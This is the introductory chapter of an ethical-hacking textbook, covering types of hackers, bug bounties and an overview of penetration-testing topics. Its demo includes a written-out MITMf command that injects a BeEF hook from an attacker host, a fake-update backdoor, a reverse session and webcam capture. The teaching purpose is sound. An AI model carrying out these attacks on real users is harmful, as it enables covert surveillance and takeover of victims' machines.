In this book, you will learn how to become an ethical hacker from scratch. We'll assume that you have no experience in ethical hacking, and, by the end of the book, you will be at an intermediate (to high) level.

Here is a quick overview of what will be covered in this book:

• Preparation
• Penetration testing
• Protecting your own system

In the first part of this book, you will learn how to create your own lab, so that you can practice ethical hacking on your own computer. You will also learn the installation of Linux systems and how to interact with them, as well as how to set up other systems to try to hack into them.

In this part of the book, we will cover the most important penetration testing fields. In each of these sections, we will first illustrate how a particular system works, and will then test the security of that system. In the following sections, we will introduce the types of penetration testing that will be seen in this book.

In network penetration testing, the first things that we will learn are how networks work and how devices interact with each other.

First, we will learn more about the networks around us; we will gradually proceed by setting up a fake access point and luring people into connecting to networks so that we can capture data that is sent or received through them. We will then learn how to get the password for any Wi-Fi network, whether it uses WEP, WPA, or WPA2 encryption.

We will also go over a large number of powerful attacks that will allow us to gain access to any account that is accessed from any computer in a network. We will be able to capture usernames, passwords, images, and pictures that computers on a network send or receive.

In this part of the chapter, we will learn how to gain access to computer systems. There are two methods to hack a computer:

• Server-side attacks
• Client-side attacks

When learning about server-side attacks, you will see how to discover weaknesses in the programs installed on the target computer, and how to use those weaknesses to gain full access to the computer.

In the client-side attacks, you're going to learn how to use social engineering to hack into the target, you'll learn how to create undetectable backdoors, backdoors that look like images and pictures, and so on. We will also learn how to gain access to any computer if that computer exists in our network by using fake updates or by using fake downloads.

In this section, we look at post exploitation, learning how to control the devices that we hacked. So, we're going to see how to open a system's webcam, manage its filesystems, and download or upload files to it. We will also learn how to capture all of the key strikes that the person enters on their keyboard, or even use that computer as a pivot to hack into other computers.

In the final sections, which will be about website penetration testing, we will learn how to gather very comprehensive information about websites, including how to discover, exploit, and mitigate a large number of serious vulnerabilities.

Finally, we will learn how to protect ourselves (and our systems) from the attacks discussed in the preceding sections.

Through hacking, you can do anything that you're not supposed to do (or allowed to do). For example, you can view information that you don't have permission to see or use a computer that you're not allowed to use. There are many different types of hacking, such as email hacking, computer hacking, server hacking, and web application hacking.

There are three different types of hackers:

• Black hat hackers: Black hat hackers hack into systems for their own benefit; these are the ones that steal money or break systems purely to benefit themselves.

• White hat hackers: White hat hackers try to secure systems; they might use the same methods as black hat hackers, but they only do it on systems for which they have permission to do so, in order to see if the systems are vulnerable—they hack them in order to fix them.
• Grey hat hackers: There are also grey hat hackers, which are a mix of both; they will test any systems that they want to test, even if they don't have permission to hack them. Once they do hack into things, they don't break anything or steal any money; they don't cause damage. They might even tell the administrators how to fix it.

In this book, we will be white hat hackers. This book is only about teaching hacking for educational purposes. It is for people who want to be able to secure their networks, and who want to work as pen testers to secure computer systems.

Hacking is an existing field—there are many job opportunities within it, it is happening every day, and it involves a growing demand for protection. We all heard about the Sony hack when PlayStation was down for a considerable amount of time. Companies such as Sony are actually hiring people to try to hack into them. You're going to learn how to hack into networks and systems so that you can secure them from black hat hackers.

Not so long ago, someone found a way to brute-force the restore password key for Facebook on its mobile website, because Facebook didn't check for the number of times that you entered the incorrect PIN. Once the person had done this, they told Facebook about it, and they were rewarded with $20,000, because Facebook has a bug bounty program. At the moment, many websites and companies have bug bounties – they are asking people to try to hack them, and they will pay a certain amount of money if a hack is successful, depending on how dangerous the exploit is.

In the coming sections, we are going to learn how to install the operating systems and programs needed for hacking. We will then learn some basics about hacking, and how to use the operating systems involved. Before we start, I'd like to give you the gist of what you're going to be able to do by the end of this book. In this section, we are going to go through an example of hacking a Windows computer from a Linux machine.

Don't worry about how we installed these machines or how to run these commands; right now, this is just an example. In the future, we're going to break this into steps, and you will see exactly how to run the attack. You will also learn about how the attack works, and how to protect yourself from such an attack.

Now, we are going to use a program called Browser Exploitation Framework (BeEF):

1. We're going to launch BeEF XSS Framework. It uses JavaScript code to hook a target computer; once a computer is hooked, we'll be able to run a number of commands. Following is a screenshot of how it looks:

2. To run the commands, we will use a man-in-the-middle attack to automatically inject the hook code for BeEF. We will use a tool called MITMf to perform an ARP spoofing attack. We will give it the network interface, gateway, and target IP address, which is the address of the Windows machine.
3. Next, we will tell MITMf that we want it to inject a JavaScript URL, and give it the location where the hook is stored. The code will look something like this:

mitmf --arp --spoof -i eth0 --gateway 10.0.2.1 --target 10.0.2.5 --inject --js-url http://10.0.2.15:3000/hook.js

4. Once this is done, hit Enter, and it will run successfully. Its output is shown here:

5. This looks very complicated; we don't know where we got the options from, so it probably all looks very confusing in the preceding screenshot. Again, don't worry; we will discuss it in detail later on, and it will become easy for you. Right now, all we need to understand is that this program is going to inject the hook code; the code allows BeEF to hack into the computer, into the browser used by the target person, and the code can run without the person even knowing.

6. Now, go to the Windows machine and run the web browser. We're just going to go to any website, such as Google or Bing.
7. If you go back to the Kali machine, you'll see that we have the IP address of the target person under Hooked Browsers, and, if you click on the Commands tab, you'll see a large number of categories, with commands that you can run on the target computer. These are shown in the following screenshot:

8. Let's display a fake notification bar to the target telling them there's a new update, so click on Social Engineering | Fake Notification Bar (Firefox), as shown in the following screenshot:

9. This is going to show the target person that there's a new update, and, once they have installed the update, we can hack into their computer. Now, let's configure the fake notification bar to install a backdoor once the user clicks on it.
10. We have a ready-made backdoor that's not detectable by antivirus programs (you will see how to do that in upcoming chapters). We will store that backdoor, and call it update.exe.

11. Next, we will click on Execute. Now, before we run the update, we will have to listen to incoming connections to connect to the target computer, once the victim tries to update their computers. Now, if we hit Execute on the fake notification bar command, the bar will be displayed in the target's browser, as shown in the following screenshot:

12. In the preceding screenshot, Firefox is showing that there is a critical update, and you need to click on Install plug-in to install that update. Once you have clicked on it, and you can see that it has downloaded an update file, save it, and then run the update.
13. If we go back to the Kali machine, we'll see that we managed to get a reverse session from the Windows machine. So, let's interact with that computer; we will basically have full control over it:

Now, let's see how to access the target computer's webcam.

To access the webcam, we are going to use a plugin that comes with Meterpreter; we will use the webcam_stream command.

When we hit Enter, we will be able to turn the webcam on. It is a webcam that's actually attached to the Windows machine; we have hacked into the Windows machine, and we can do anything we want on it. Again, this is just an example of one attack that we're going to use. We're going to perform many more attacks like this, and all of them are going to allow us to gain full control over the target system.

In this chapter, we looked at some brief descriptions of the topics that will be thoroughly covered in this book. We discussed using a Linux machine to hack a computer with the Windows operating system. Then, we learned about the concept of hacking through the use of real-time examples. The different types of hackers were discussed. Finally, we saw various applications involved in hacking.

In the following chapter, we will set up a virtual environment to perform various penetration tests. We will also install Kali Linux, Windows, and Metaspoitable machines.